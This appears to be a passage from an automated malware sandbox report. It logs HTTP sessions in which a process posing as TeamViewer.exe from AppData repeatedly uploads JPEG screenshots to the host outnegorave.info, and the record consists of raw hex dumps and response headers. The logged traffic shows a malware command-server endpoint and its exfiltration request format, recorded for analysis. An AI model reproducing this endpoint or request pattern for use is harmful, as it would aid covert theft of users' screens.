                                                                                                                                    2021-09-15 11:52:13 UTC1100OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:13 UTC1116OUTData Raw: 7c 52 39 71 7b 22 85 2d 25 2d 7b 27 10 51 8a 28 a0 41 8a f4 3f 85 05 92 3d 65 a3 5d ec 04 44 2e 71 93 f3 f1 9a e0 20 8b ce 99 63 07 19 ef 5d 57 86 35 59 fc 38 b7 5f 67 48 e6 6b 8d 99 2e 0e 17 6e ef 43 fe d5 29 42 53 8e 85 46 49 3d 4f 4d fb 5e a3 ff 00 40 bf fc 98 5a 3e d7 a8 ff 00 d0 2f ff 00 26 16 b8 49 bc 67 ad 49 f7 24 86 1f f7 23 07 f9 e6 ba fb 89 6c 05 c4 a1 f5 5b d4 60 e7 2a ac d8 53 9e 83 8a e6 a9 4a 50 b5 cd e3 35 2d 86 5e 5a 59 6b 36 57 96 7a d4 71 c0 5a 50 54 19 54 b2 1d 8b 86 53 eb 5e 47 ae e9 13 68 ba 83 5b 4b 22 4a 9d 63 96 33 95 75 f5 f6 3e a3 ff 00 d7 5e b7 e7 69 df f4 18 bf ff 00 be db ff 00 89 ae 5b e2 99 53 6d a2 14 76 75 29 2e 19 ba b0 c4 7c 9a 74 a4 d3 b0 aa 25 6b 9e 79 49 4e c0 a4 c5 74 58 c0 4a 29 71 46 0d 00 6e 78 2f fe 46 ed 3b fe
                                                                                                                                    Data Ascii: |R9q{"-%-{'Q(A?=e]D.q c]W5Y8_gHk.nC)BSFI=OM^@Z>/&IgI$#l[`*SJP5-^ZYk6WzqZPTTS^Gh[K"Jc3u>^i[Smvu).|t%kyINtXJ)qFnx/F;
                                                                                                                                    2021-09-15 11:52:13 UTC1132OUTData Raw: 50 93 a5 c2 fe 1c 56 91 c4 b7 ba b1 9c a8 72 ec ee 73 ff 00 63 9f bc 4c 3e b4 86 dd c7 de c0 fc 6b 4e 5d 3e f8 f2 d9 6f c6 ab 3d 9d c2 75 89 ab 68 d4 4f a9 84 94 97 42 af 91 ea c2 97 c9 51 d5 aa 56 8a 45 ea a4 7e 14 dd a4 75 15 a2 68 cd b6 37 cb 41 ea 69 70 a3 f8 45 14 b4 ec 2b b0 c8 ec 00 a5 c9 f5 a4 a5 a2 c4 87 3e b4 a2 92 96 81 0b 45 14 52 01 45 28 a4 a5 14 99 2c 70 ad 1b 2c 64 62 b3 85 5f b2 3c 8a c6 aa f7 4d b0 ef df 3a d5 38 d3 49 ff 00 66 bc fa ef fd 63 7d 6b bd ce 34 96 3f ec d7 01 74 7f 78 df 5a e5 c0 6f 23 d3 cc 1f c0 75 16 df f2 2a c7 fe 7b d6 43 d6 b4 07 fe 29 48 bf cf 7a c6 76 39 aa a0 b5 97 a9 86 31 e9 1f 41 8c 48 e8 68 0e c3 a3 1a 4c e6 92 ba ec 79 9c cc 90 4e e3 be 69 de 78 3f 79 01 a8 68 a5 ca 8a 53 68 94 f9 0d f7 93 14 86 da 06 e8 71 51
                                                                                                                                    Data Ascii: PVrscL>kN]>o=uhOBQVE~uh7AipE+>ERE(,p,db_<M:8Ifc}k4?txZo#u*{C)Hzv91AHhLyNix?yhShqQ
                                                                                                                                    2021-09-15 11:52:13 UTC1148OUTData Raw: 8a 28 a0 05 a0 52 51 9a 62 1d 45 25 2d 30 0a 28 a5 a0 41 4b 45 18 a6 21 69 69 28 a6 20 34 a2 92 94 50 02 8a 4a 51 48 69 88 29 69 28 14 80 70 a7 0a 6d 2d 52 13 16 8a 4a 5a 60 2d 14 51 41 22 d1 45 14 c0 28 a2 8a 04 38 52 d3 45 28 a6 80 5a 5a 4a 5a 64 85 2d 25 28 a6 02 d1 45 14 c4 2d 14 94 b4 08 29 69 29 69 a0 1d 45 20 a5 a6 48 52 8a 28 a6 02 d1 40 a5 a6 21 29 29 68 a0 04 1d 69 f4 c1 d6 9f 42 06 14 1a 28 a6 48 0a 5a 41 4e c5 08 18 a0 53 a9 b4 e1 54 89 62 77 a5 a4 3d 69 c2 98 08 29 d4 da 51 4c 4c 5a 28 a2 81 00 a5 a4 14 ea 62 12 9d 49 45 30 63 a9 69 a2 96 99 23 b3 4a 29 b4 a2 9a 13 1c 29 69 b4 e1 4c 96 14 b4 94 53 10 b4 52 52 d0 01 4b 49 4b 40 0b 4b 4d a7 50 26 14 a2 92 96 81 0b 45 25 2d 02 0a 5a 28 a6 01 4a 28 a5 14 09 8b 40 a4 a5 14 08 d0 d2 47 ef dc fa 21
                                                                                                                                    Data Ascii: (RQbE%-0(AKE!ii( 4PJQHi)i(pm-RJZ`-QA"E(8RE(ZZJZd-%(E-)i)iE HR(@!))hiB(HZANSTbw=i)QLLZ(bIE0ci#J))iLSRRKIK@KMP&E%-Z(J(@G!
                                                                                                                                    2021-09-15 11:52:13 UTC1164OUTData Raw: 02 1c 28 a4 a5 aa 10 a2 96 9b 9a 5a 62 1d 9a 5a 6d 2d 02 1c 29 45 36 94 1a a4 c9 64 82 8a 40 68 aa 44 8b 4b 49 46 69 85 85 cd 19 a4 14 b4 5c 56 14 52 e6 99 4b 9a 77 0b 0f cd 2d 33 34 b9 a6 4d 87 0a 5c d3 73 45 3b 85 87 e6 8c d3 73 46 ef 6a 2e 2b 12 03 4b 9a 8f 71 f5 a3 3e f4 ee 2b 12 64 51 9a 8f 34 b9 a2 e2 b0 fc d1 9a 6e 68 cd 3b 85 87 52 e6 9b 46 68 b8 ac 3b 34 b9 a6 66 8c d3 b8 58 7e 68 cd 33 75 26 ea 2e 1c a4 99 a3 35 1e ea 37 52 b8 72 92 6e a4 dd 51 17 a6 97 a1 c8 6a 04 c5 a9 a5 ea 22 f4 d2 d5 2e 65 28 12 97 a6 17 a8 cb 53 0b 54 39 16 a0 48 5f de 98 5a 98 5a 98 5a a1 c8 d1 44 79 6a 61 6a 69 6a 61 6a cd c8 d1 44 71 34 c2 69 09 a4 a8 6c b4 85 26 92 92 8c d2 63 b0 86 8a 0d 36 a4 a4 19 a2 92 92 95 c7 62 86 3b d2 d2 51 5c a7 58 b4 51 46 28 00 a2 8a 28 10
                                                                                                                                    Data Ascii: (ZbZm-)E6d@hDKIFi\VRKw-34M\sE;sFj.+Kq>+dQ4nh;RFh;4fX~h3u&.57RrnQj".e(ST9H_ZZZDyjajijajDq4il&c6b;Q\XQF((
                                                                                                                                    2021-09-15 11:52:13 UTC1180OUTData Raw: 95 73 da ff 00 c3 5d 42 cf 74 da 44 9f 6d 84 73 e5 b6 16 51 fd 1b f4 fa 53 3c 41 f0 e3 51 b0 dd 36 94 c6 fa 01 ce c0 31 2a 8f a7 f1 7e 1c fb 57 41 e1 1f 03 68 66 d6 3b eb 99 7f b4 64 3d 51 97 6a 46 dd d4 a7 5c 8e e1 bf 2a 40 79 5c d1 49 04 ad 14 f1 bc 72 21 c3 23 a9 04 1f 70 69 95 d1 fc 42 44 8f c6 b7 e9 1a aa 22 88 80 55 18 00 79 49 5c e5 50 82 ad e9 b6 4d 7d 74 23 07 6a 0e 5d bd 05 54 ae 83 c2 fb 71 72 0f 5f 97 f2 e6 a6 4e cb 42 2a 54 54 d7 3b 57 b1 b9 67 a3 5b 84 d9 6d 66 24 da 39 25 37 1f c6 ab ea 1e 1c 17 0a c2 3b 56 86 61 d0 aa 11 f9 8a dd 1b ff 00 b3 6d c4 59 31 8c ef c7 f7 f3 df f0 c5 6d e9 be 6f d8 53 cf ce ec 9d bb ba ed ed fd 6b 0c 4d 29 50 c3 ac 42 96 bd 8f 46 18 ea 75 a7 ec a3 0f 74 f1 69 a2 78 26 78 a5 52 ae 84 ab 03 d8 d3 2b 6b c6 3e 5f fc
                                                                                                                                    Data Ascii: s]BtDmsQS<AQ61*~WAhf;d=QjF\*@y\Ir!#piBD"UyI\PM}t#j]Tqr_NB*TT;Wg[mf$9%7;VamY1moSkM)PBFutix&xR+k>_
                                                                                                                                    2021-09-15 11:52:13 UTC1183OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 36 38 37 38 37 39 32 37 31 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2687879271--
                                                                                                                                    2021-09-15 11:52:14 UTC1183INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:14 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=28c7256b50a29eaa4dd51b3b8b5c0731a110e799f0f986e99cfb1cdd217476b1; expires=Thu, 15-Sep-2022 11:52:13 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bvBuL8iZvHU%2B1CDRLK569jULSWOFy19rKIiLXz891SbmZb1OIpASIQHKp9dhF1nNC7B%2FSpvV0anTwUIfFnnv7L7OsdbxalJ0M1BuoyGlQV5jGrNFf9wJbHRGkLJBZF4coitK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5ce8ab742e7-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:14 UTC1184INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    14192.168.2.549805172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:14 UTC1184OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84930
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1383517322
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:14 UTC1184OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 33 38 33 35 31 37 33 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1383517322Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:14 UTC1184OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 39 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^9;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:14 UTC1184OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:14 UTC1200OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:14 UTC1216OUTData Raw: 44 d1 9b 6c 6f 96 83 d4 d2 e1 47 f0 8a 29 69 d8 57 61 91 d8 01 4b 93 eb 49 4b 45 89 0e 7d 69 45 25 2d 02 16 8a 28 a4 02 8a 51 49 4a 29 32 58 e1 5a 36 58 c8 c5 67 0a bf 64 79 15 8d 55 ee 9b 61 df be 75 aa 71 a6 93 fe cd 79 f5 df fa c6 fa d7 7b 9c 69 2c 7f d9 ae 02 e8 fe f1 be b5 cb 80 de 47 a7 98 3f 80 ea 2d bf e4 55 8f fc f7 ac 87 ad 68 0f fc 52 91 7f 9e f5 8c ec 73 55 41 6b 2f 53 0c 63 d2 3e 83 18 91 d0 d0 1d 87 46 34 99 cd 25 75 d8 f3 39 99 20 9d c7 7c d3 bc f0 7e f2 03 50 d1 4b 95 14 a6 d1 29 f2 1b ef 26 29 0d b4 0d d0 e2 a3 a2 8b 3e 8c 6a ab ea 0d a7 a9 fb ac 2a 26 d3 e4 1d 39 a9 b2 7a 83 52 2c 8e 3f 88 d1 79 22 d4 d1 9e d6 b2 af 55 35 19 8d 87 50 6b 60 4a dd c0 a7 6e 43 f7 90 1a 7e d1 ae 86 8b 5e a6 19 04 76 34 95 b6 61 b7 7e ab 8a 61 b0 85 be eb 62
                                                                                                                                    Data Ascii: DloG)iWaKIKE}iE%-(QIJ)2XZ6XgdyUauqy{i,G?-UhRsUAk/Sc>F4%u9 |~PK)&)>j*&9zR,?y"U5Pk`JnC~^v4a~ab
                                                                                                                                    2021-09-15 11:52:14 UTC1232OUTData Raw: a6 8a 51 4d 00 b4 b4 94 b4 c9 0a 5a 4a 51 4c 05 a2 8a 29 88 5a 29 29 68 10 52 d2 52 d3 40 3a 8a 41 4b 4c 90 a5 14 51 4c 05 a2 81 4b 4c 42 52 52 d1 40 08 3a d3 e9 83 ad 3e 84 0c 28 34 51 4c 90 14 b4 82 9d 8a 10 31 40 a7 53 69 c2 a9 12 c4 ef 4b 48 7a d3 85 30 10 53 a9 b4 a2 98 98 b4 51 45 02 01 4b 48 29 d4 c4 25 3a 92 8a 60 c7 52 d3 45 2d 32 47 66 94 53 69 45 34 26 38 52 d3 69 c2 99 2c 29 69 28 a6 21 68 a4 a5 a0 02 96 92 96 80 16 96 9b 4e a0 4c 29 45 25 2d 02 16 8a 4a 5a 04 14 b4 51 4c 02 94 51 4a 28 13 16 81 49 4a 28 11 a1 a4 8f df b9 f4 43 55 8f 53 f5 ab 5a 4f fa e9 3f dd 35 54 f5 3f 5a c9 7c 6c 27 f0 a0 a2 8a 2b 43 20 a5 a4 a5 a0 42 d1 49 4b 48 4c 5a 28 a2 80 0a 51 45 14 84 2d 14 51 48 42 d2 8a 4a 05 02 1d 4a bd 69 b4 b4 98 22 dc 46 b5 f4 c6 fd f2 d6 2c
                                                                                                                                    Data Ascii: QMZJQL)Z))hRR@:AKLQLKLBRR@:>(4QL1@SiKHz0SQEKH)%:`RE-2GfSiE4&8Ri,)i(!hNL)E%-JZQLQJ(IJ(CUSZO?5T?Z|l'+C BIKHLZ(QE-QHBJJi"F,
                                                                                                                                    2021-09-15 11:52:14 UTC1248OUTData Raw: a6 e6 8d de d4 5c 56 24 06 97 35 1e e3 eb 46 7d e9 dc 56 24 c8 a3 35 1e 69 73 45 c5 61 f9 a3 34 dc d1 9a 77 0b 0e a5 cd 36 8c d1 71 58 76 69 73 4c cd 19 a7 70 b0 fc d1 9a 66 ea 4d d4 5c 39 49 33 46 6a 3d d4 6e a5 70 e5 24 dd 49 ba a2 2f 4d 2f 43 90 d4 09 8b 53 4b d4 45 e9 a5 aa 5c ca 50 25 2f 4c 2f 51 96 a6 16 a8 72 2d 40 90 bf bd 30 b5 30 b5 30 b5 43 91 a2 88 f2 d4 c2 d4 d2 d4 c2 d5 9b 91 a2 88 e2 69 84 d2 13 49 50 d9 69 0a 4d 25 25 19 a4 c7 61 0d 14 1a 6d 49 48 33 45 25 25 2b 8e c5 0c 77 a5 a4 a2 b9 4e b1 68 a2 8c 50 01 45 14 50 21 68 a2 92 80 0a 28 a2 80 0a 5a 4a 5a 00 28 a2 8a 04 14 51 45 30 0a 28 a2 80 0a 5a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 05 14 50 29 69 88 4a 29 68 a0 02 8a 28 a0 41 45 14 53 00 a5 a2 8a 00 28 a2 8a 00 29 68 a2 80 12 8a 5a
                                                                                                                                    Data Ascii: \V$5F}V$5isEa4w6qXvisLpfM\9I3Fj=np$I/M/CSKE\P%/L/Qr-@000CiIPiM%%amIH3E%%+wNhPEP!h(ZJZ(QE0(Z((((P)iJ)h(AES()hZ
                                                                                                                                    2021-09-15 11:52:14 UTC1264OUTData Raw: 1d c3 7e 54 80 f2 b9 a2 92 09 5a 29 e3 78 e4 43 86 47 52 08 3e e0 d3 2b a3 f8 84 89 1f 8d 6f d2 35 54 45 11 00 aa 30 00 f2 92 b9 ca a1 05 5b d3 6c 9a fa e8 46 0e d4 1c bb 7a 0a a9 5d 07 85 f6 e2 e4 1e bf 2f e5 cd 4c 9d 96 84 54 a8 a9 ae 76 af 63 72 cf 46 b7 09 b2 da cc 49 b4 72 4a 6e 3f 8d 57 d4 3c 38 2e 15 84 76 ad 0c c3 a1 54 23 f3 15 ba 37 ff 00 66 db 88 b2 63 19 df 8f ef e7 bf e1 8a db d3 7c df b0 a7 9f 9d d9 3b 77 75 db db fa d6 18 9a 52 a1 87 58 85 2d 7b 1e 8c 31 d4 eb 4f d9 46 1e e9 e2 d3 44 f0 4c f1 4a a5 5d 09 56 07 b1 a6 56 d7 8c 7c bf f8 4a 2f 7c ac 63 72 e7 1e bb 46 7f 5a c5 ad a9 cb 9e 0a 5d d1 c5 25 66 d0 51 45 2d 58 82 92 96 8a 00 4a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 90 05 14 51 40 09 45 2d 25 00 14 51 45 00 14 b4 94 50
                                                                                                                                    Data Ascii: ~TZ)xCGR>+o5TE0[lFz]/LTvcrFIrJn?W<8.vT#7fc|;wuRX-{1OFDLJ]VV|J/|crFZ]%fQE-XJ(((((Q@E-%QEP
                                                                                                                                    2021-09-15 11:52:14 UTC1267OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 33 38 33 35 31 37 33 32 32 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1383517322--
                                                                                                                                    2021-09-15 11:52:15 UTC1267INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:15 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=10042fce5adbdffe46b4fd39c14deab727d8c28a1d2264d5053f1d8dbd65bf5d; expires=Thu, 15-Sep-2022 11:52:14 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pUbBjFmQwk0%2BKyDj%2Fwf7hcNMpkUCwdvbxOjuGtXqvjp%2BaomlUdJ1IU%2FaTXLaHjVioxFBqBcpZk83Xsq%2FiyiMo1apxX%2Fbeen1bOAbqbJAFEoivEzp3bnYNIqMQe48x%2BVaH%2F4g"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5d53eea4a97-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:15 UTC1268INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    15192.168.2.549806172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:16 UTC1268OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84992
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------2011772679
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:16 UTC1268OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 30 31 31 37 37 32 36 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2011772679Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:16 UTC1268OUTData Raw: 9b d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 85 15 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 cd c9 a7 51 fe d1 49 1a 5e c2 70 95 e1 35 5f 84 67
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcKQI^p5_g
                                                                                                                                    2021-09-15 11:52:16 UTC1269OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
